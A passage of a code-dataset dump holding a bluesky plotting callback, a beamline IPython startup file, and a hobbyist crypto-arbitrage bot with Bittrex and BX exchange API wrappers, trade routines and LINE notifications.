"text": "from bluesky.callbacks.mpl_plotting import LivePlot, QtAwareCallback\nfrom functools import partial\nimport matplotlib.pyplot as plt\nimport threading\nfrom bluesky.callbacks.core import CallbackBase, get_obj_fields, make_class_safe\n\n\nclass HackLivePlot(LivePlot):\n \"\"\"\n Build a function that updates a plot from a stream of Events.\n\n Note: If your figure blocks the main thread when you are trying to\n scan with this callback, call `plt.ion()` in your IPython session.\n\n Parameters\n ----------\n y : str\n the name of a data field in an Event\n x : str, optional\n the name of a data field in an Event, or 'seq_num' or 'time'\n If None, use the Event's sequence number.\n Special case: If the Event's data includes a key named 'seq_num' or\n 'time', that takes precedence over the standard 'seq_num' and 'time'\n recorded in every Event.\n legend_keys : list, optional\n The list of keys to extract from the RunStart document and format\n in the legend of the plot. The legend will always show the\n scan_id followed by a colon (\"1: \"). Each\n xlim : tuple, optional\n passed to Axes.set_xlim\n ylim : tuple, optional\n passed to Axes.set_ylim\n ax : Axes, optional\n matplotib Axes; if none specified, new figure and axes are made.\n fig : Figure, optional\n deprecated: use ax instead\n epoch : {'run', 'unix'}, optional\n If 'run' t=0 is the time recorded in the RunStart document. If 'unix',\n t=0 is 1 Jan 1970 (\"the UNIX epoch\"). Default is 'run'.\n All additional keyword arguments are passed through to ``Axes.plot``.\n\n Examples\n --------\n >>> my_plotter = LivePlot('det', 'motor', legend_keys=['sample'])\n >>> RE(my_scan, my_plotter)\n \"\"\"\n def __init__(self, y, x=None, *, legend_keys=None, xlim=None, ylim=None,\n epoch='run', fig_factory=None, **kwargs):\n # don't use super to \"skip\" a level!\n QtAwareCallback.__init__(self, use_teleporter=kwargs.pop('use_teleporter', None))\n self.__setup_lock = threading.Lock()\n self.__setup_event = threading.Event()\n\n def setup():\n # Run this code in start() so that it runs on the correct thread.\n nonlocal y, x, legend_keys, xlim, ylim, epoch, kwargs\n import matplotlib.pyplot as plt\n with self.__setup_lock:\n if self.__setup_event.is_set():\n return\n self.__setup_event.set()\n if fig_factory is None:\n ax_factory = plt.subplots\n\n fig, ax = fig_factory()\n\n self.ax = ax\n\n if legend_keys is None:\n legend_keys = []\n self.legend_keys = ['scan_id'] + legend_keys\n if x is not None:\n self.x, *others = get_obj_fields([x])\n else:\n self.x = 'seq_num'\n self.y, *others = get_obj_fields([y])\n self.ax.set_ylabel(y)\n self.ax.set_xlabel(x or 'sequence #')\n if xlim is not None:\n self.ax.set_xlim(*xlim)\n if ylim is not None:\n self.ax.set_ylim(*ylim)\n self.ax.margins(.1)\n self.kwargs = kwargs\n self.lines = []\n self.legend = None\n self.legend_title = \" :: \".join([name for name in self.legend_keys])\n self._epoch_offset = None # used if x == 'time'\n self._epoch = epoch\n\n self._LivePlot__setup = setup\n"
},
{
"alpha_fraction": 0.6230088472366333,
"alphanum_fraction": 0.6247787475585938,
"avg_line_length": 24.393259048461914,
"blob_id": "b0fb3479c7bb7d1c9b613599ecf3bdb535a0c561",
"content_id": "fd4ed3c69046c4d642206e5e3bd96c966d41105b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2260,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 89,
"path": "/startup/00-base.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f\"Loading {__file__}...\")\n\nimport nslsii\nimport matplotlib as mpl\nfrom IPython.terminal.prompts import Prompts, Token\n\n\nclass SRXPrompt(Prompts):\n def in_prompt_tokens(self, cli=None):\n return [\n (Token.Prompt, \"BlueSky@SRX [\"),\n (Token.PromptNum, str(self.shell.execution_count)),\n (Token.Prompt, \"]: \"),\n ]\n\n\nip = get_ipython()\nnslsii.configure_base(ip.user_ns, \"srx\")\nnslsii.configure_olog(ip.user_ns)\nip.prompts = SRXPrompt(ip)\n\n\n# Optional: set any metadata that rarely changes.\nRE.md[\"beamline_id\"] = \"SRX\"\n\n\n# Custom Matplotlib configs:\nmpl.rcParams[\"axes.grid\"] = True # grid always on\n\n\n# Comment it out to enable BEC table:\nbec.disable_table()\n\n\n# Disable BestEffortCallback to plot ring current\nbec.disable_plots()\n\n\n# Temporary fix before it's fixed in ophyd\nimport logging\nlogger = logging.getLogger('ophyd')\nlogger.setLevel('WARNING')\n\nfrom pathlib import Path\n\nimport appdirs\n\n\ntry:\n from bluesky.utils import PersistentDict\nexcept ImportError:\n import msgpack\n import msgpack_numpy\n import zict\n\n class PersistentDict(zict.Func):\n def __init__(self, directory):\n self._directory = directory\n self._file = zict.File(directory)\n super().__init__(self._dump, self._load, self._file)\n\n @property\n def directory(self):\n return self._directory\n\n def __repr__(self):\n return f\"<{self.__class__.__name__} {dict(self)!r}>\"\n\n @staticmethod\n def _dump(obj):\n \"Encode as msgpack using numpy-aware encoder.\"\n # See https://github.com/msgpack/msgpack-python#string-and-binary-type\n # for more on use_bin_type.\n return msgpack.packb(\n obj,\n default=msgpack_numpy.encode,\n use_bin_type=True)\n\n @staticmethod\n def _load(file):\n return msgpack.unpackb(\n file,\n object_hook=msgpack_numpy.decode,\n raw=False)\n\n# runengine_metadata_dir = appdirs.user_data_dir(appname=\"bluesky\") / Path(\"runengine-metadata\")\nrunengine_metadata_dir = Path('/nsls2/xf05id1/shared/config/runengine-metadata')\n\nRE.md = PersistentDict(runengine_metadata_dir)\n"
}
] | 5 |
layel2/crypto-arbitrage
|
https://github.com/layel2/crypto-arbitrage
|
c6aba9de1c2218fc9db127c97a92c5a46da6ff9f
|
bbae84d737bb049513dfe8f20695d6e3722cda40
|
106a681b370b074e7ac07dd067fc94e8733098a3
|
refs/heads/master
| 2022-11-28T00:29:02.181343 | 2020-08-02T17:28:37 | 2020-08-02T17:28:37 | 284,482,525 | 0 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6665029525756836,
"alphanum_fraction": 0.6797642707824707,
"avg_line_length": 36.71296310424805,
"blob_id": "965abaadcda19e9fbf96f7efa46c242926e1f121",
"content_id": "9f3fc98012166777f09997fe71891ef84a4954f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4072,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 108,
"path": "/bittrexapi.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nimport hashlib\nimport time\nimport hmac\n\nkey = \"\"\nsecret = \"\"\n\n\ndef createOrder(pairing,tradeType,amount,rate): #type buy or sell\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\tif(tradeType=='buy'):\n\t\tamount = amount/rate\n\n\tamount = amount*0.99\n\turl = \"https://api.bittrex.com/api/v1.1/market/\"+tradeType+\"limit?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing+\"&quantity=\"+str(amount)+\"&rate=\"+str(rate)\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef getBalance(currency):\n\tcurrency=DOGcheck(currency)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/getbalance?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()['result']['Balance']\n\ndef getDepositAddr(currency):\n\tcurrency=DOGcheck(currency)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/getdepositaddress?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef withdraw(currency,amount,addr,payId=None):\n\tcurrency=DOGcheck(currency)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/withdraw?\"\n\tif(currency == 'XRP' and (payId!=None) ):\n\t\turl = \turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency+\"&quantity=\"+str(amount)+\"&address=\"+addr.split('?dt=')[0]+\"&paymentid=\"+addr.split('?dt=')[1]\n\telse:\n\t\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency+\"&quantity=\"+str(amount)+\"&address=\"+addr\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef orderHistory(pairing):\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/getorderhistory?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef getPrice(pairing,tradeType):\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/public/getorderbook?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing+\"&type=\"+tradeType\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()['result'][0]['Rate'] , r.json()['result'][0]['Quantity']\n\ndef DOGcheck(pairing):\n\ttempPair = pairing.split('-')\n\tif(len(tempPair) == 1):\n\t\tif(pairing == 'DOG'):\n\t\t\tpairing = 'DOGE'\n\telif(len(tempPair) == 2):\n\t\tif(tempPair[0] == 'DOG'):\n\t\t\ttempPair[0] = 'DOGE'\n\t\t\tpairing = '%s-%s'%(tempPair[0],tempPair[1])\n\t\telif(tempPair[1] == 'DOG'):\n\t\t\ttempPair[1] = 'DOGE'\n\t\t\tpairing = '%s-%s'%(tempPair[0],tempPair[1])\n\treturn pairing\ndef pairCheck(pairing):\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/public/getticker?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()['success']\n\n#a = orderHistory('BTC-BSV')\n#print(a)\n'''bx_sent_cur = ['BTC','ETH','REP','BCH','BSV','XCN','DAS','DOG','EOS','EVX','FTC','GNO','HYP','LTC','NMC','OMG','PND','XPY','PPC','POW','XPM','XRP','ZEC','XZC','ZMN']\nfor i in bx_sent_cur:\n\tprint(getDepostiAddr(i))'''\n\n#print(getPrice('BTC-XRP','sell'))\n#print(type(getBalance('BTC')))\n#print(createOrder('ETH-DOGE','buy',1,1))\n#print(DOGcheck('DOG'))\n#print(getDepositAddr('BSV'))\n\n'''a=getBalance('XRP')\nprint(a)\nprint(a == None)'''\n#print(pairCheck('XRP-BTC'))"
},
{
"alpha_fraction": 0.6982455849647522,
"alphanum_fraction": 0.6982455849647522,
"avg_line_length": 30.66666603088379,
"blob_id": "0d1263866c1e2c3686527271ff9c68c30e1bee0e",
"content_id": "4756ffcafa0f67384c5af0cc0cb5250ea2632a6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 9,
"path": "/lineMsg.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\n\ndef sentLine(msg):\n\ttoken = \"\" #Line token\n\turl = \"https://notify-api.line.me/api/notify\"\n\theaders = {'content-type':'application/x-www-form-urlencoded','Authorization':'Bearer '+token}\n\t\n\tr=requests.post(url,headers = headers ,data = {'message':msg})\n\t#print(r.text)\n"
},
{
"alpha_fraction": 0.7047244310379028,
"alphanum_fraction": 0.712598443031311,
"avg_line_length": 22.045454025268555,
"blob_id": "32219087e0ebd4ec71ed5c869fd71bcc684e4119",
"content_id": "2e3f0673a5fc539dd2698eb0a81748c8ed5db482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 22,
"path": "/call.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nimport numpy as np\nfrom myFunc import *\nfrom autotrade import *\nfrom routeKucoin import *\n\nbx = getBx()\nbt = getBittrex()\n#kucoin = getKucoin()\n#okex = getOkex()\n#Route = getRoute2(bt,okex)\n#Route = getRoute3(bx,kucoin)\n#Route = getRoute4(bt,kucoin)\nRoute = getRoute(bx,bt)\n#print(Route)\nprint(Route.tradeRoute)\nprint(Route.profit)\n#print(len(Route.profit))\n#if(not Route.profit == []):\n#\tif(np.max(Route.profit) > 5):\n#\t\tprint(\"Trade!\")\n#\t\tTrade = routeTrade(Route.profit,Route.tradeRoute)\n\n"
},
{
"alpha_fraction": 0.6463841199874878,
"alphanum_fraction": 0.6632970571517944,
"avg_line_length": 28.06779670715332,
"blob_id": "3f3cc13fc9d43544abeb4bf47a14684f2f4591e1",
"content_id": "dc83340fc56925a21fa2cbdb14dc2f3da2eb8066",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5144,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 177,
"path": "/autotrade.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport bxapi\nimport bittrexapi\nimport time\nimport requests\n\ndef bxTrade(pairing):\n\ttradeA = pairing.split('-')[0]\n\ttradeB = pairing.split('-')[1]\n\tif(bxapi.getPairID(pairing) == None):\n\t\tpairing = \"%s-%s\"%(tradeB,tradeA)\n\t\ttradeType = 'sell'\n\telse:\n\t\ttradeType = 'buy'\n\tamount = bxapi.getBalance(tradeA)\n\tif(tradeType == 'buy'):\n\t\ttradeTypeCheck = 'sell'\n\telif(tradeType == 'sell'):\n\t\ttradeTypeCheck = 'buy'\n\trate,maxAm = bxapi.getPrice(pairing,tradeTypeCheck)\n\tbeforeTrade = bxapi.getBalance(tradeB)\n\torder = bxapi.createOrder(pairing,tradeType,amount,rate)\n\tprint(order)\n\tif(order['success'] == False):\n\t\tprint(\"error bxTrade()\")\n\t\tprint(order['error'])\n\t\texit()\n\n\twhile True:\n\t\ttime.sleep(10)\n\t\tafterTrade = bxapi.getBalance(tradeB)\n\t\tif(tradeType == 'buy'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount/rate):\n\t\t\t\tbreak;\n\t\telif(tradeType == 'sell'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount*rate):\n\t\t\t\tbreak;\n\t\telse:\n\t\t\tamount = bxapi.getBalance(tradeA)\n\t\t\trate,maxAm = bxapi.getPrice(pairing,tradeTypeCheck)\n\t\t\torder = bxapi.createOrder(pairing,tradeType,amount,rate)\n\t\t\tprint(order)\n\t\tpass\n\tprint('Success')\n\ndef bittrexTrade(pairing):\n\ttradeA = pairing.split('-')[0]\n\ttradeB = pairing.split('-')[1]\n\tallm = requests.get(\"https://api.bittrex.com/api/v1.1/public/getmarkets\").json()\n\tfor i in range(0,len(allm['result'])):\n\t\tif(allm['result'][i]['BaseCurrency']==tradeA and allm['result'][i]['MarketCurrency']==tradeB):\n\t\t\ttradePair = allm['result'][i]['MarketName']\n\t\t\ttradeType = 'buy'\n\t\telif(allm['result'][i]['BaseCurrency']==tradeB and allm['result'][i]['MarketCurrency']==tradeA):\n\t\t\ttradePair = allm['result'][i]['MarketName']\n\t\t\ttradeType = 'sell'\n\n\tamount = bittrexapi.getBalance(tradeA)\n\tif(tradeType == 'buy'):\n\t\ttradeTypeCheck = 'sell'\n\telif(tradeType == 'sell'):\n\t\ttradeTypeCheck = 'buy'\n\n\trate,maxAm = bittrexapi.getPrice(tradePair,tradeTypeCheck)\n\tbeforeTrade = bittrexapi.getBalance(tradeB)\n\tprint(pairing)\n\tprint(tradeType)\n\tprint(amount)\n\tprint(rate)\n\tprint(amount/rate)\n\torder = bittrexapi.createOrder(tradePair,tradeType,amount,rate)\n\tprint(order)\n\tif(order['success'] == False):\n\t\tprint(\"error bittrexTrade()\")\n\t\tprint(order['message'])\n\t\texit()\n\n\twhile True:\n\t\ttime.sleep(10)\n\t\tafterTrade = bittrexapi.getBalance(tradeB)\n\t\tif(tradeType == 'buy'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount/rate):\n\t\t\t\tbreak;\n\t\telif(tradeType == 'sell'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount*rate):\n\t\t\t\tbreak;\n\t\telse :\n\t\t\tamount = bittrexapi.getBalance(tradeA)\n\t\t\trate,maxAm = bittrexapi.getPrice(tradePair,tradeTypeCheck)\n\t\t\torder = bittrexapi.createOrder(tradePair,tradeType,amount,rate)\n\t\t\tprint(order)\n\t\tpass\n\tprint(\"Success\")\n\n\ndef routeTrade(profit,tradeRoute):\n maxR = np.argmax(profit)\n route = tradeRoute[maxR]\n print(\"Start Trade\")\n print(route)\n #---bx THB->A ----\n print(\"In Bx Trading\")\n bxTrade(route[0])\n print(\"In Bx Trade Success\")\n #--- bx->bittrex ---\n print(\"Sending to bittrex\")\n sendCur1 = route[0].split('-')[1]\n print(sendCur1)\n sendAmount1 = bxapi.getBalance(sendCur1)\n sendA1 = bittrexapi.getDepositAddr(sendCur1)\n if(sendA1['success'] == False):\n \texit()\n sendAddr1 = sendA1['result']['Address']\n if(sendCur1 == 'XRP'):\n \tsendAddr1 = '' #xrp addr\n #print(sendAddr1)\n beforeSend1 = bittrexapi.getBalance(sendCur1)\n tran1 = bxapi.withdraw(sendCur1,sendAmount1,sendAddr1)\n print(tran1)\n if(tran1['success'] == False):\n \tprint('Trans1 error')\n \tprint(tran1['error'])\n \texit()\n while True:\n \ttime.sleep(90)\n \tafterSend1 = bittrexapi.getBalance(sendCur1)\n \tif(afterSend1 == None or beforeSend1 == None):\n \t\tif(afterSend1 != None):\n \t\t\tbreak;\n \telif(afterSend1 > beforeSend1):\n \t\tbreak;\n \tpass\n print('Now at bittrex')\n #----@bittrex B/A\n print(\"In Bittrex Trading\")\n bittrexTrade(route[1])\n print(\"In Bittrex Trade Success\")\n #----@bittrex B/C\n print(\"In Bittrex Trading\")\n bittrexTrade(route[2])\n print(\"In Bittrex Trade Success\")\n #send back to bx\n sendCur2 = route[2].split('-')[1]\n sendAmount2 = bittrexapi.getBalance(sendCur2)\n '''sendA2 = bxapi.getDepositAddr2(sendCur2)\n if(sendA2['success'] == False):\n \texit()'''\n sendAddr2 = bxapi.getDepositAddr2(sendCur2)\n beforeSend2 = bxapi.getBalance(sendCur2)\n print(\"Sending to Bx\")\n tran2 = bittrexapi.withdraw(sendCur2,sendAmount2,sendAddr2)\n print(tran2)\n if(tran2['success']==False):\n \tprint('trans 2 error')\n \tprint(tran2['message'])\n \texit()\n while True:\n \ttime.sleep(90)\n \tafterSend2 = bxapi.getBalance(sendCur2)\n \tif(afterSend2 > beforeSend2):\n \t\tbreak;\n \tpass\n print(\"Now at Bx\")\n #BX trade back to thb\n print(\"In Bx Trading\")\n bxTrade(route[3])\n print(\"In Bx Trade Success\")\n print(\"In Bx Trading\")\n bxTrade(route[4])\n print(\"In Bx Trade Success\")\n print(\"Program Trade Complete\")\n return \"Trade Complete\"\n\n#profit = [0,2]\n#tradeRoute = [[],['THB-GNO','GNO-BTC','BTC-DOG','DOG-BTC','BTC-THB']]\n#routeTrade(profit,tradeRoute)\n#bittrexTrade(\"BTC-FTC\")"
},
{
"alpha_fraction": 0.6098901033401489,
"alphanum_fraction": 0.6538461446762085,
"avg_line_length": 14.25,
"blob_id": "f26920cce3ed3c2d8e40f69c275ddbdebf85240d",
"content_id": "cbd6dcfc48a72224910e14a1396fbb83307de7e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 12,
"path": "/rcall.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "from RouteCk import *\nimport time\nfrom lineMsg import *\ni = 0\nwhile True:\n\tprint(\"Start\")\n\tRouteCkLine()\n\ti = i + 1\n\tif(i==12):\n\t\tsentLine(\"Status Checked\")\n\t\ti = 0\n\ttime.sleep(300)"
},
{
"alpha_fraction": 0.6329004168510437,
"alphanum_fraction": 0.6398268342018127,
"avg_line_length": 35.125,
"blob_id": "f4be8491a5cc43b6b72bf03f73c7401fd06c87ff",
"content_id": "d4fd18afa3db19323732723a62051e9c0418fdbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1155,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 32,
"path": "/RouteCk.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nfrom myFunc import *\nfrom routeKucoin import *\nimport datetime as dt\n\ndef RouteCkLine():\n\tnoti_token = \"\"\n\tnoti_url = \"https://notify-api.line.me/api/notify\"\n\tnoti_headers = {'content-type':'application/x-www-form-urlencoded','Authorization':'Bearer '+noti_token}\n\t#select = {1:getRoute(bx,bt),2:getRoute2(),3:getRoute3(bx,kucoin),4:getRoute4(bt,kucoin)}\n\tbx = getBx()\n\tbt = getBittrex()\n\tkucoin = getKucoin()\n\tRoute = getRoute(bx,bt)\n\n\tif(Route.tradeRoute != []):\n\t\tnoti_msg = str(dt.datetime.now()) +'Bx -> Bt'+\"\\n\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tnoti_msg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit) +\"\\n\" +\"---------\"+\"\\n\"\n\t\t\tprint(noti_msg)\t\t\n\t\t\tr=requests.post(noti_url,headers = noti_headers ,data = {'message':noti_msg})\n\t\t\t#print(r.text)\n\n\tRoute = getRoute3(bx,kucoin)\n\n\tif(Route.tradeRoute != []):\n\t\tnoti_msg = str(dt.datetime.now()) +'Bx -> Kucoin'+\"\\n\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tnoti_msg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit) +\"\\n\" +\"---------\"+\"\\n\"\n\t\t\tprint(noti_msg)\t\t\n\t\t\tr=requests.post(noti_url,headers = noti_headers ,data = {'message':noti_msg})\n\t\t\t#print(r.text)"
},
{
"alpha_fraction": 0.6497027277946472,
"alphanum_fraction": 0.712485134601593,
"avg_line_length": 39.03809356689453,
"blob_id": "d900e5e7ed5f555710d4eaafd7f24441e18cca4b",
"content_id": "9e77b44537161869028ece70856879423ec02d33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4205,
"license_type": "no_license",
"max_line_length": 715,
"num_lines": 105,
"path": "/bxapi.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nimport hashlib\nimport time\n\n\nkey = \"\"\nsecret = \"\"\n\n#nonce = str(time.time())\n#signature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\ndef createOrder(pairing,tradeType,amount,rate):\n\tpairID = getPairID(pairing)\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\tamount = float(amount)\n\trate = float(rate)\n\turl = \"https://bx.in.th/api/order/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'pairing':pairID,'type':tradeType,'amount':amount,'rate':rate});\n\treturn r.json()\n\ndef cancelOrder(pairing,order_id):\n\tnonce = str(time.time())\n\tpairID = getPairID(pairing)\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/cancel/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'pairing':pairID,'order_id':order_id});\n\treturn r.json()\n\ndef getBalances():\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/balance/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature});\n\treturn r.json()\n\ndef getBalance(currency):\n\t\treturn float(getBalances()['balance'][currency]['available'])\n\ndef getDepositAddr(currency):\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/deposit/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'currency':currency});\n\treturn r.json()\n\ndef getDepositAddr2(currency):\n\tcurAddr={'BTC':'3Hy1YoEmDQYeG1p3tKJgPBDMmTAmT8sfy7','ETH':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','REP':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','BCH':'bitcoincash:qp6n6kn0lkkenxwhd9dsajnd90n7p5eq0cwn7zfhgj','BSV':'bitcoincash:qp6n6kn0lkkenxwhd9dsajnd90n7p5eq0cwn7zfhgj','DAS':'Xc6ibPyBwjfDtYvva4dNg7R6rP8xuJNCqG','DOG':'DByLBCnEVwCu7hEekE7H2ZXNY68ijkfRQT','DOGE':'DByLBCnEVwCu7hEekE7H2ZXNY68ijkfRQT','FTC':'6uwzEKjapNpNvs9ovhpjnyaV1jf1r9TwK9','GNO':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','LTC':'LeqJRqF7R9VDTquVUqZosgLjshQriwwex4','OMG':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','POW':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','XRP':'rp7Fq2NQVRJxQJvUZ4o8ZzsTSocvgYoBbs?dt=1033113822','ZEC':'t1avqg1RmHp895os4NWVnj8uMAZyPTHAhSH','XZC':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19'}\n\treturn curAddr[currency]\n\ndef withdraw(currency,amount,addr): #for XRP addr+'?dt='+tag\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/withdrawal/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'currency':currency,'amount':amount,'address':addr});\n\treturn r.json()\n\ndef wdHistory():\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/withdrawal-history/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature});\n\treturn r.json()\n\ndef TransHistory():\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/history/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature});\n\treturn r.json()['transactions']\n\ndef getPrice(pairing,tradeType):\n\tpairID = getPairID(pairing)\n\turl = \"https://bx.in.th/api/orderbook/?pairing=\"+str(pairID)\n\tr = requests.get(url)\n\tdata = r.json()\n\tif(tradeType == 'buy'):\n\t\treturn float(data['bids'][0][0]),float(data['bids'][0][1])\n\tif(tradeType == 'sell'):\n\t\treturn float(data['asks'][0][0]),float(data['asks'][0][1])\n\ndef getPairID(pairing):\n\turl = \"https://bx.in.th/api/pairing/\"\n\treq = requests.get(url)\n\tallPair = req.json()\n\tpairing = pairing.split('-')\n\tfor i in range(1,35):\n\t\ttry:\n\t\t\tif(pairing[0]==allPair[str(i)]['primary_currency'] and pairing[1]==allPair[str(i)]['secondary_currency']):\n\t\t\t\treturn i\n\t\texcept:\n\t\t\tpass\n\n'''a,s =getPrice('THB-DOG','buy')\nprint(a)\nprint(s)'''\n#print(getPairID('THB-XRP')==None)\n#w=createOrder('BTC-XRP','buy',1,0.0001)\n#print(w)\n#print(getDepositAddr('ETH'))\n#print(getPrice('THB-BTC','sell'))\n#print(getDepositAddr2('DOGE'))\n#print(getBalance('THB'))\n#print(TransHistory()[3])\n#print(getBalance('THB'))\n\n"
},
{
"alpha_fraction": 0.37428224086761475,
"alphanum_fraction": 0.38907256722450256,
"avg_line_length": 48.982608795166016,
"blob_id": "00d9a4bcc68eddd7ef6b8d9e1a12670e9c2420c4",
"content_id": "c4310c151cbb5b104a3edb8179aca689372130a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5747,
"license_type": "no_license",
"max_line_length": 267,
"num_lines": 115,
"path": "/routeOkex.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
